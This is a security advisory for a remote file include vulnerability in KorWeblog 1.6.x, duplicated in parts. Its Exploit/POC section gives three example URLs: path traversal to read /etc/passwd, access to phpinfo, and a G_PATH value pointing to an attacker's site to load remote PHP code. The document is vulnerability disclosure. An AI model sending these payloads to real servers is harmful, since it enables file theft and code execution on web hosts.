KorWeblog Remote File Include Vulnerability
BID:12132
Info
KorWeblog Remote File Include Vulnerability
| Bugtraq ID: | 12132 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 30 2004 12:00AM |
| Updated: | Dec 30 2004 12:00AM |
| Credit: | Discovery is credited to Min-sung Choi. |
| Vulnerable: |
KorWeblog KorWeblog 1.6.1 KorWeblog KorWeblog 1.6.2-cvs |
| Not Vulnerable: | |
Discussion
KorWeblog Remote File Include Vulnerability
KorWeblog is prone to a vulnerability that may allow attackers to influence the include path for external files.
This vulnerability could be exploited to cause malicious PHP code to be executed, but could also allow for disclosure of local files. This would occur in the context of the Web server hosting the software.
KorWeblog is prone to a vulnerability that may allow attackers to influence the include path for external files.
This vulnerability could be exploited to cause malicious PHP code to be executed, but could also allow for disclosure of local files. This would occur in the context of the Web server hosting the software.
Exploit / POC
KorWeblog Remote File Include Vulnerability
The following examples were provided:
http://www.example.com/weblog/install/index.php?lng=../../../../../../etc/passwd%00
http://www.example.com/weblog/install/index.php?lng=../../phpinfo
http://www.example.com/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[attacker's site]
The following examples were provided:
http://www.example.com/weblog/install/index.php?lng=../../../../../../etc/passwd%00
http://www.example.com/weblog/install/index.php?lng=../../phpinfo
http://www.example.com/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[attacker's site]
Solution / Fix
KorWeblog Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
KorWeblog Remote File Include Vulnerability
References:
References:
- KorWeblog Homepage (KorWeblog)
- KorWeblog php injection Vulnerability (Min-sung Choi
)